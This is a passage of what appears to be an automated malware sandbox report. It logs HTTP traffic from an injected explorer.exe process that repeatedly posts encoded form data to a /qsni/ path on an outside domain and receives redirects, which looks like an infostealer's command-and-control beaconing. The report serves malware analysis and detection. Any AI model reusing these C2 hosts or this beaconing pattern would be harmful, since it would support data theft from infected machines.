                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          5192.168.2.64971281.17.29.15080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:02.087157011 CEST111OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.pgatraining.com
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.pgatraining.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.pgatraining.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 28 6e 6a 72 39 76 6c 45 35 33 49 62 73 77 4d 39 34 35 35 41 4e 71 56 6e 61 69 73 4e 45 72 67 74 6d 55 7a 56 53 59 79 49 53 53 38 5f 34 50 79 78 49 63 35 51 68 33 4b 4d 41 39 63 35 4d 2d 4c 4e 57 4c 7e 36 62 30 36 4b 4e 34 34 46 5a 78 54 5a 56 71 7e 66 34 30 7a 63 4a 72 36 35 38 41 4b 63 53 4e 52 41 53 52 6e 51 78 7a 53 74 5a 38 58 39 42 35 58 65 52 4a 74 73 7e 6f 65 6c 78 59 59 44 4c 74 46 51 7e 51 39 30 6c 6f 6f 37 43 34 64 72 78 43 30 36 31 4d 4e 55 52 5a 55 30 36 32 47 78 33 71 58 53 41 69 50 77 44 65 49 42 7e 4c 77 49 31 6b 43 36 51 48 53 71 75 79 6c 67 41 70 56 6e 32 67 28 38 70 36 4c 62 67 64 41 2d 4f 34 42 62 39 46 58 41 76 6c 32 75 38 49 51 4c 54 77 6d 65 70 45 30 63 44 6d 45 61 61 73 6b 4f 7a 61 61 69 56 38 4f 57 63 74 75 4b 4e 74 50 73 4a 75 34 43 55 4b 44 48 34 62 61 71 66 33 6c 77 6b 36 33 5f 61 53 6e 47 36 52 78 6f 52 6e 65 43 74 54 71 36 38 69 74 70 6c 4d 36 68 72 73 36 4c 49 34 73 6d 49 70 74 79 69 4f 33 39 65 44 31 37 31 2d 41 64 33 65 46 79 30 56 75 5f 4e 79 4b 6e 7e 39 32 51 55 4a 4a 67 59 6d 68 62 44 48 32 76 28 78 69 50 72 42 6e 69 54 74 49 30 35 4c 72 34 49 7a 5a 47 50 33 67 59 77 4c 4b 30 6e 56 6f 6a 5a 57 5a 31 72 55 6b 77 35 67 74 37 49 77 61 33 6f 44 74 35 30 4b 46 37 6e 74 71 33 4f 42 4d 2d 52 76 48 67 39 4e 4e 73 76 71 48 6f 7a 52 62 66 67 67 49 58 68 6e 41 63 4b 30 31 6a 77 44 55 47 50 38 6b 6a 47 59 46 32 58 70 66 49 77 49 4d 70 77 53 35 6f 61 54 75 6a 69 61 6c 72 6a 54 59 53 52 78 48 48 32 77 39 62 45 2d 30 64 52 7a 33 6d 47 41 64 4e 6d 69 39 53 44 4a 72 48 6d 30 79 66 4f 4b 56 52 4d 57 59 55 4d 45 4d 54 79 62 62 68 7e 48 52 6f 78 79 71 79 66 54 62 51 68 54 32 76 78 4e 71 68 72 45 45 51 6c 75 64 66 73 4b 39 68 4b 74 79 66 69 4b 48 74 56 5f 72 6e 6f 7a 4f 58 55 50 42 6f 6c 54 4c 64 44 35 33 49 79 68 62 63 4d 50 70 77 71 62 5a 67 4a 5f 4f 74 57 6a 28 50 4c 66 73 45 49 6e 42 72 51 65 70 78 45 47 69 70 59 6c 31 71 67 71 62 6b 77 4e 76 31 6e 54 56 52 38 72 53 62 4a 56 36 6a 4a 43 6a 6a 28 4d 72 58 4d 4c 75 4c 7e 57 54 31 52 4d 75 38 33 64 78 42 53 5f 62 74 58 47 73 46 6b 4a 66 38 76 42 38 46 61 48 34 59 42 71 73 6c 4e 6b 57 37 62 4c 47 50 7a 4a 46 42 52 53 7e 33 7a 2d 64 35 59 68 73 4e 73 61 45 33 69 49 4e 70 4c 4c 7a 2d 30 42 4a 47 48 38 51 45 75 77 48 6c 37 34 53 73 4d 64 49 31 6f 31 36 49 6c 31 74 39 76 7a 4c 53 6f 55 54 62 75 45 4d 37 69 58 44 70 46 56 79 7a 4e 46 62 54 31 4b 4d 75 77 57 55 51 55 75 6e 56 35 76 36 68 37 43 64 31 6f 31 30 56 45 51 46 75 6d 6d 63 77 7a 44 42 51 6a 67 30 5f 69 62 7a 57 6c 37 45 35 6e 4f 4e 69 75 46 5a 69 4c 68 6d 45 78 37 47 53 44 54 54 4a 66 6f 64 34 34 4a 70 67 55 37 4d 55 64 4d 43 76 50 56 41 75 78 45 64 4f 63 55 54 72 39 4c 4a 67 39 7a 43 65 59 4b 4d 36 6f 66 34 49 71 47 66 4c 51 47 35 35 5a 56 66 50 65 69 63 5f 59 2d 4f 75 33 38 7a 53 32 68 59 43 34 61 68 72 79 41 73 68 6a 74 46 6a 54 38 45 6e 79 39 59 61 47 65 28 41 53 45 74 36 58 71 31 67 67 57 6a 76 42 4b 34 71 55 32 42 7a 4a 77 41 4f 32 65 6b 6f 4d 35 50 6c 44 32 39 54 4d 59 47 6d 49 76 7e 72 6e 37 4f 75 33 4a 43 43 30 30 6e 67 69 35 32 31 5a 74 64 53 49 45 6a 4a 53 55 38 35 58 75 6f 6a 55 35 48 66 6d 6d 38 38 48 47 75 69 74 6d 53 5f 57 63 34 75 71 4c 76 51 35 2d 6e 4e 46 6e 38 71 4d 5f 7a 49 31 70 53 68 37 32 4a 46 49 69 4a 63 6d 42 63 57 49 50 6b 51 45 38 7a 30 4d 78 4c 32 31 52 54 79 36 6b 72 33 6f 78 28 76 41 72 6b 4d 38 68 41 43 68 30 4a 4e 68 38 6e 42 39 61 67 59 55 73 4a 33 57 56 4e 75 4f 49 56 79 6e 70 6f 64 38 73 31 66 49 51 50 31 75 69 7a 72 64 54 57 38 52 30 77 33 7e 62 52 55 55 74 44 6c 31 63 76 2d 79 68 35 73 4e 46 34 2d 54 4e 47 53 4a 51 65 4c 53 6c 38 67 6c 6b 4e 5a 39 64 66 78 79 32 76 44 41 59 33 63 47 78 70 35 32 39 4e 79 42 59 58 33 62 6d 55 45 31 55 36 5a 44 42 79 61 34 49 41 5f 53 43 61 57 68 46 28 7a 73 39 64 57 55 33 69 30 61 6c 44 70 59 4d 30 6f 4a 59 5a 73 59 74 6b 48 54 39 52 58 50 4d 61 4b 39 67 45 69 46 59 7e 46 51 65 6c 6a 78 49 61 5a 59 52 39 59 64 30 35 36 79 76 69 36 70 41 78 30 47 44 72 41 52 52 30 47 79 44 42 66 6e 36 31 65 4e 71 45 75 4e 32 43 37 38 56 45 36 6b 61 72 66 4f 62 72 41 53 75 61 66 5a 67 6c 75 76 6e 78 38 74 48 39 49 30 59 6e 69 73 50 43 66
                                                                                          Data Ascii: C6=(njr9vlE53IbswM9455ANqVnaisNErgtmUzVSYyISS8_4PyxIc5Qh3KMA9c5M-LNWL~6b06KN44FZxTZVq~f40zcJr658AKcSNRASRnQxzStZ8X9B5XeRJts~oelxYYDLtFQ~Q90loo7C4drxC061MNURZU062Gx3qXSAiPwDeIB~LwI1kC6QHSquylgApVn2g(8p6LbgdA-O4Bb9FXAvl2u8IQLTwmepE0cDmEaaskOzaaiV8OWctuKNtPsJu4CUKDH4baqf3lwk63_aSnG6RxoRneCtTq68itplM6hrs6LI4smIptyiO39eD171-Ad3eFy0Vu_NyKn~92QUJJgYmhbDH2v(xiPrBniTtI05Lr4IzZGP3gYwLK0nVojZWZ1rUkw5gt7Iwa3oDt50KF7ntq3OBM-RvHg9NNsvqHozRbfggIXhnAcK01jwDUGP8kjGYF2XpfIwIMpwS5oaTujialrjTYSRxHH2w9bE-0dRz3mGAdNmi9SDJrHm0yfOKVRMWYUMEMTybbh~HRoxyqyfTbQhT2vxNqhrEEQludfsK9hKtyfiKHtV_rnozOXUPBolTLdD53IyhbcMPpwqbZgJ_OtWj(PLfsEInBrQepxEGipYl1qgqbkwNv1nTVR8rSbJV6jJCjj(MrXMLuL~WT1RMu83dxBS_btXGsFkJf8vB8FaH4YBqslNkW7bLGPzJFBRS~3z-d5YhsNsaE3iINpLLz-0BJGH8QEuwHl74SsMdI1o16Il1t9vzLSoUTbuEM7iXDpFVyzNFbT1KMuwWUQUunV5v6h7Cd1o10VEQFummcwzDBQjg0_ibzWl7E5nONiuFZiLhmEx7GSDTTJfod44JpgU7MUdMCvPVAuxEdOcUTr9LJg9zCeYKM6of4IqGfLQG55ZVfPeic_Y-Ou38zS2hYC4ahryAshjtFjT8Eny9YaGe(ASEt6Xq1ggWjvBK4qU2BzJwAO2ekoM5PlD29TMYGmIv~rn7Ou3JCC00ngi521ZtdSIEjJSU85XuojU5Hfmm88HGuitmS_Wc4uqLvQ5-nNFn8qM_zI1pSh72JFIiJcmBcWIPkQE8z0MxL21RTy6kr3ox(vArkM8hACh0JNh8nB9agYUsJ3WVNuOIVynpod8s1fIQP1uizrdTW8R0w3~bRUUtDl1cv-yh5sNF4-TNGSJQeLSl8glkNZ9dfxy2vDAY3cGxp529NyBYX3bmUE1U6ZDBya4IA_SCaWhF(zs9dWU3i0alDpYM0oJYZsYtkHT9RXPMaK9gEiFY~FQeljxIaZYR9Yd056yvi6pAx0GDrARR0GyDBfn61eNqEuN2C78VE6karfObrASuafZgluvnx8tH9I0YnisPCfVx(N4ztPC77tQVryu2oLbwt_V0itK650fXcPEAiCkdsyog5n4Klk0ji4eb7MA79WA8Xvw1MnrWoKR-h-lSgJ~Jo.
                                                                                          Mar 30, 2023 10:24:02.113265038 CEST112INHTTP/1.1 302 Found
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 11
                                                                                          date: Thu, 30 Mar 2023 08:24:01 GMT
                                                                                          location: http://survey-smiles.com
                                                                                          server: nginx
                                                                                          set-cookie: sid=3a10b23e-ced4-11ed-9852-5ad2f6b9f24f; path=/; domain=.pgatraining.com; expires=Tue, 17 Apr 2091 11:38:09 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                          Data Ascii: Redirecting


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          50192.168.2.64975781.17.29.15080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:59.469527960 CEST349OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.pgatraining.com
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.pgatraining.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.pgatraining.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 28 6e 6a 72 39 76 6c 45 35 33 49 62 76 51 38 39 72 71 52 41 4c 4b 56 67 55 43 73 4e 53 62 67 68 6d 55 28 56 53 5a 33 58 53 45 6b 5f 34 64 61 78 4a 2d 52 51 6a 33 4b 4d 47 39 63 31 43 65 4b 4f 57 4c 71 32 62 31 4c 33 4e 37 55 46 5a 53 62 5a 54 75 65 63 73 55 7a 65 44 4c 36 32 38 41 4c 45 53 4e 68 4d 53 53 4b 4c 78 77 69 74 5a 4f 50 39 49 70 58 5a 50 5a 74 73 7e 6f 65 70 78 59 59 72 4c 74 63 58 7e 53 4d 76 6c 62 77 37 44 61 56 72 33 56 67 37 6b 63 4e 51 65 4a 56 42 30 33 62 6e 78 38 71 6d 4a 44 44 72 63 4e 51 78 37 72 39 61 6b 68 57 38 4c 43 63 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=(njr9vlE53IbvQ89rqRALKVgUCsNSbghmU(VSZ3XSEk_4daxJ-RQj3KMG9c1CeKOWLq2b1L3N7UFZSbZTuecsUzeDL628ALESNhMSSKLxwitZOP9IpXZPZts~oepxYYrLtcX~SMvlbw7DaVr3Vg7kcNQeJVB03bnx8qmJDDrcNQx7r9akhW8LCc.
                                                                                          Mar 30, 2023 10:26:59.494611979 CEST349INHTTP/1.1 302 Found
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 11
                                                                                          date: Thu, 30 Mar 2023 08:26:58 GMT
                                                                                          location: http://survey-smiles.com
                                                                                          server: nginx
                                                                                          set-cookie: sid=a3cb09f4-ced4-11ed-9278-5ad28c5317ec; path=/; domain=.pgatraining.com; expires=Tue, 17 Apr 2091 11:41:06 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                          Data Ascii: Redirecting


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          51192.168.2.64975881.17.29.15080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:27:02.016891003 CEST352OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.pgatraining.com
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.pgatraining.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.pgatraining.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 28 6e 6a 72 39 76 6c 45 35 33 49 62 73 77 4d 39 34 35 35 41 4e 71 56 6e 61 69 73 4e 45 72 67 74 6d 55 7a 56 53 59 79 49 53 53 38 5f 34 50 79 78 49 63 35 51 68 33 4b 4d 41 39 63 35 4d 2d 4c 4e 57 4c 7e 36 62 30 36 4b 4e 34 34 46 5a 78 54 5a 56 71 7e 66 34 30 7a 63 4a 72 36 35 38 41 4b 63 53 4e 52 41 53 52 6e 51 78 7a 53 74 5a 38 58 39 42 35 58 65 52 4a 74 73 7e 6f 65 6c 78 59 59 44 4c 74 46 51 7e 51 39 30 6c 6f 6f 37 43 34 64 72 78 43 30 36 31 4d 4e 55 52 5a 55 30 36 32 47 78 33 71 58 53 41 69 50 77 44 65 49 42 7e 4c 77 49 31 6b 43 36 51 48 53 71 75 79 6c 67 41 70 56 6e 32 67 28 38 70 36 4c 62 67 64 41 2d 4f 34 42 62 39 46 58 41 76 6c 32 75 38 49 51 4c 54 77 6d 65 70 45 30 63 44 6d 45 61 61 73 6b 4f 7a 61 61 69 56 38 4f 57 63 74 75 4b 4e 74 50 73 4a 75 34 43 55 4b 44 48 34 62 61 71 66 33 6c 77 6b 36 33 5f 61 53 6e 47 36 52 78 6f 52 6e 65 43 74 54 71 36 38 69 74 70 6c 4d 36 68 72 73 36 4c 49 34 73 6d 49 70 74 79 69 4f 33 39 65 44 31 37 31 2d 41 64 33 65 46 79 30 56 75 5f 4e 79 4b 6e 7e 39 32 51 55 4a 4a 67 59 6d 68 62 44 48 32 76 28 78 69 50 72 42 6e 69 54 74 49 30 35 4c 72 34 49 7a 5a 47 50 33 67 59 77 4c 4b 30 6e 56 6f 6a 5a 57 5a 31 72 55 6b 77 35 67 74 37 49 77 61 33 6f 44 74 35 30 4b 46 37 6e 74 71 33 4f 42 4d 2d 52 76 48 67 39 4e 4e 73 76 71 48 6f 7a 52 62 66 67 67 49 58 68 6e 41 63 4b 30 31 6a 77 44 55 47 50 38 6b 6a 47 59 46 32 58 70 66 49 77 49 4d 70 77 53 35 6f 61 54 75 6a 69 61 6c 72 6a 54 59 53 52 78 48 48 32 77 39 62 45 2d 30 64 52 7a 33 6d 47 41 64 4e 6d 69 39 53 44 4a 72 48 6d 30 79 66 4f 4b 56 52 4d 57 59 55 4d 45 4d 54 79 62 62 68 7e 48 52 6f 78 79 71 79 66 54 62 51 68 54 32 76 78 4e 71 68 72 45 45 51 6c 75 64 66 73 4b 39 68 4b 74 79 66 69 4b 48 74 56 5f 72 6e 6f 7a 4f 58 55 50 42 6f 6c 54 4c 64 44 35 33 49 79 68 62 63 4d 50 70 77 71 62 5a 67 4a 5f 4f 74 57 6a 28 50 4c 66 73 45 49 6e 42 72 51 65 70 78 45 47 69 70 59 6c 31 71 67 71 62 6b 77 4e 76 31 6e 54 56 52 38 72 53 62 4a 56 36 6a 4a 43 6a 6a 28 4d 72 58 4d 4c 75 4c 7e 57 54 31 52 4d 75 38 33 64 78 42 53 5f 62 74 58 47 73 46 6b 4a 66 38 76 42 38 46 61 48 34 59 42 71 73 6c 4e 6b 57 37 62 4c 47 50 7a 4a 46 42 52 53 7e 33 7a 2d 64 35 59 68 73 4e 73 61 45 33 69 49 4e 70 4c 4c 7a 2d 30 42 4a 47 48 38 51 45 75 77 48 6c 37 34 53 73 4d 64 49 31 6f 31 36 49 6c 31 74 39 76 7a 4c 53 6f 55 54 62 75 45 4d 37 69 58 44 70 46 56 79 7a 4e 46 62 54 31 4b 4d 75 77 57 55 51 55 75 6e 56 35 76 36 68 37 43 64 31 6f 31 30 56 45 51 46 75 6d 6d 63 77 7a 44 42 51 6a 67 30 5f 69 62 7a 57 6c 37 45 35 6e 4f 4e 69 75 46 5a 69 4c 68 6d 45 78 37 47 53 44 54 54 4a 66 6f 64 34 34 4a 70 67 55 37 4d 55 64 4d 43 76 50 56 41 75 78 45 64 4f 63 55 54 72 39 4c 4a 67 39 7a 43 65 59 4b 4d 36 6f 66 34 49 71 47 66 4c 51 47 35 35 5a 56 66 50 65 69 63 5f 59 2d 4f 75 33 38 7a 53 32 68 59 43 34 61 68 72 79 41 73 68 6a 74 46 6a 54 38 45 6e 79 39 59 61 47 65 28 41 53 45 74 36 58 71 31 67 67 57 6a 76 42 4b 34 71 55 32 42 7a 4a 77 41 4f 32 65 6b 6f 4d 35 50 6c 44 32 39 54 4d 59 47 6d 49 76 7e 72 6e 37 4f 75 33 4a 43 43 30 30 6e 67 69 35 32 31 5a 74 64 53 49 45 6a 4a 53 55 38 35 58 75 6f 6a 55 35 48 66 6d 6d 38 38 48 47 75 69 74 6d 53 5f 57 63 34 75 71 4c 76 51 35 2d 6e 4e 46 6e 38 71 4d 5f 7a 49 31 70 53 68 37 32 4a 46 49 69 4a 63 6d 42 63 57 49 50 6b 51 45 38 7a 30 4d 78 4c 32 31 52 54 79 36 6b 72 33 6f 78 28 76 41 72 6b 4d 38 68 41 43 68 30 4a 4e 68 38 6e 42 39 61 67 59 55 73 4a 33 57 56 4e 75 4f 49 56 79 6e 70 6f 64 38 73 31 66 49 51 50 31 75 69 7a 72 64 54 57 38 52 30 77 33 7e 62 52 55 55 74 44 6c 31 63 76 2d 79 68 35 73 4e 46 34 2d 54 4e 47 53 4a 51 65 4c 53 6c 38 67 6c 6b 4e 5a 39 64 66 78 79 32 76 44 41 59 33 63 47 78 70 35 32 39 4e 79 42 59 58 33 62 6d 55 45 31 55 36 5a 44 42 79 61 34 49 41 5f 53 43 61 57 68 46 28 7a 73 39 64 57 55 33 69 30 61 6c 44 70 59 4d 30 6f 4a 59 5a 73 59 74 6b 48 54 39 52 58 50 4d 61 4b 39 67 45 69 46 59 7e 46 51 65 6c 6a 78 49 61 5a 59 52 39 59 64 30 35 36 79 76 69 36 70 41 78 30 47 44 72 41 52 52 30 47 79 44 42 66 6e 36 31 65 4e 71 45 75 4e 32 43 37 38 56 45 36 6b 61 72 66 4f 62 72 41 53 75 61 66 5a 67 6c 75 76 6e 78 38 74 48 39 49 30 59 6e 69 73 50 43 66
                                                                                          Data Ascii: C6=(njr9vlE53IbswM9455ANqVnaisNErgtmUzVSYyISS8_4PyxIc5Qh3KMA9c5M-LNWL~6b06KN44FZxTZVq~f40zcJr658AKcSNRASRnQxzStZ8X9B5XeRJts~oelxYYDLtFQ~Q90loo7C4drxC061MNURZU062Gx3qXSAiPwDeIB~LwI1kC6QHSquylgApVn2g(8p6LbgdA-O4Bb9FXAvl2u8IQLTwmepE0cDmEaaskOzaaiV8OWctuKNtPsJu4CUKDH4baqf3lwk63_aSnG6RxoRneCtTq68itplM6hrs6LI4smIptyiO39eD171-Ad3eFy0Vu_NyKn~92QUJJgYmhbDH2v(xiPrBniTtI05Lr4IzZGP3gYwLK0nVojZWZ1rUkw5gt7Iwa3oDt50KF7ntq3OBM-RvHg9NNsvqHozRbfggIXhnAcK01jwDUGP8kjGYF2XpfIwIMpwS5oaTujialrjTYSRxHH2w9bE-0dRz3mGAdNmi9SDJrHm0yfOKVRMWYUMEMTybbh~HRoxyqyfTbQhT2vxNqhrEEQludfsK9hKtyfiKHtV_rnozOXUPBolTLdD53IyhbcMPpwqbZgJ_OtWj(PLfsEInBrQepxEGipYl1qgqbkwNv1nTVR8rSbJV6jJCjj(MrXMLuL~WT1RMu83dxBS_btXGsFkJf8vB8FaH4YBqslNkW7bLGPzJFBRS~3z-d5YhsNsaE3iINpLLz-0BJGH8QEuwHl74SsMdI1o16Il1t9vzLSoUTbuEM7iXDpFVyzNFbT1KMuwWUQUunV5v6h7Cd1o10VEQFummcwzDBQjg0_ibzWl7E5nONiuFZiLhmEx7GSDTTJfod44JpgU7MUdMCvPVAuxEdOcUTr9LJg9zCeYKM6of4IqGfLQG55ZVfPeic_Y-Ou38zS2hYC4ahryAshjtFjT8Eny9YaGe(ASEt6Xq1ggWjvBK4qU2BzJwAO2ekoM5PlD29TMYGmIv~rn7Ou3JCC00ngi521ZtdSIEjJSU85XuojU5Hfmm88HGuitmS_Wc4uqLvQ5-nNFn8qM_zI1pSh72JFIiJcmBcWIPkQE8z0MxL21RTy6kr3ox(vArkM8hACh0JNh8nB9agYUsJ3WVNuOIVynpod8s1fIQP1uizrdTW8R0w3~bRUUtDl1cv-yh5sNF4-TNGSJQeLSl8glkNZ9dfxy2vDAY3cGxp529NyBYX3bmUE1U6ZDBya4IA_SCaWhF(zs9dWU3i0alDpYM0oJYZsYtkHT9RXPMaK9gEiFY~FQeljxIaZYR9Yd056yvi6pAx0GDrARR0GyDBfn61eNqEuN2C78VE6karfObrASuafZgluvnx8tH9I0YnisPCfVx(N4ztPC77tQVryu2oLbwt_V0itK650fXcPEAiCkdsyog5n4Klk0ji4eb7MA79WA8Xvw1MnrWoKR-h-lSgJ~Jo.
                                                                                          Mar 30, 2023 10:27:02.041692972 CEST352INHTTP/1.1 302 Found
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 11
                                                                                          date: Thu, 30 Mar 2023 08:27:01 GMT
                                                                                          location: http://survey-smiles.com
                                                                                          server: nginx
                                                                                          set-cookie: sid=a54fb630-ced4-11ed-85af-5ad242dfe064; path=/; domain=.pgatraining.com; expires=Tue, 17 Apr 2091 11:41:09 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                          Data Ascii: Redirecting


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          52192.168.2.64975981.17.29.15080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:27:04.641196012 CEST353OUTGET /qsni/?ZOm=dXna0d&C6=ylLL+a8J/3JJvCdIraNgF6BSXSl8NPtUrBXqEYbPGkQO18qlBvsQ7giWAZIzNvf1UZKYMEb3cvhxf0GhUtqt7EXDK++t1UbmIuhNRAnUxFPd HTTP/1.1
                                                                                          Host: www.pgatraining.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:27:04.667037010 CEST354INHTTP/1.1 200 OK
                                                                                          accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 610
                                                                                          content-type: text/html; charset=utf-8
                                                                                          date: Thu, 30 Mar 2023 08:27:03 GMT
                                                                                          server: nginx
                                                                                          set-cookie: sid=a6e03556-ced4-11ed-b97f-5ad254eadb88; path=/; domain=.pgatraining.com; expires=Tue, 17 Apr 2091 11:41:11 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 70 67 61 74 72 61 69 6e 69 6e 67 2e 63 6f 6d 2f 71 73 6e 69 2f 3f 43 36 3d 79 6c 4c 4c 2b 61 38 4a 25 32 46 33 4a 4a 76 43 64 49 72 61 4e 67 46 36 42 53 58 53 6c 38 4e 50 74 55 72 42 58 71 45 59 62 50 47 6b 51 4f 31 38 71 6c 42 76 73 51 37 67 69 57 41 5a 49 7a 4e 76 66 31 55 5a 4b 59 4d 45 62 33 63 76 68 78 66 30 47 68 55 74 71 74 37 45 58 44 4b 2b 2b 74 31 55 62 6d 49 75 68 4e 52 41 6e 55 78 46 50 64 26 5a 4f 6d 3d 64 58 6e 61 30 64 26 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 34 4d 44 45 33 4d 6a 41 79 4e 43 77 69 61 57 46 30 49 6a 6f 78 4e 6a 67 77 4d 54 59 30 4f 44 49 30 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 44 68 70 59 54 42 6a 61 44 6b 79 61 32 45 7a 59 6e 55 7a 5a 57 38 79 62 44 5a 77 64 57 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4f 44 41 78 4e 6a 51 34 4d 6a 51 73 49 6e 52 7a 49 6a 6f 78 4e 6a 67 77 4d 54 59 30 4f 44 49 30 4e 6a 51 34 4e 54 45 35 66 51 2e 6c 72 46 74 79 6b 43 4c 61 66 4d 78 6f 77 32 59 78 69 6b 71 31 75 57 41 72 48 41 5a 47 6c 35 33 66 32 54 38 30 6a 30 63 6a 74 6f 26 73 69 64 3d 61 36 65 30 33 35 35 36 2d 63 65 64 34 2d 31 31 65 64 2d 62 39 37 66 2d 35 61 64 32 35 34 65 61 64 62 38 38 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
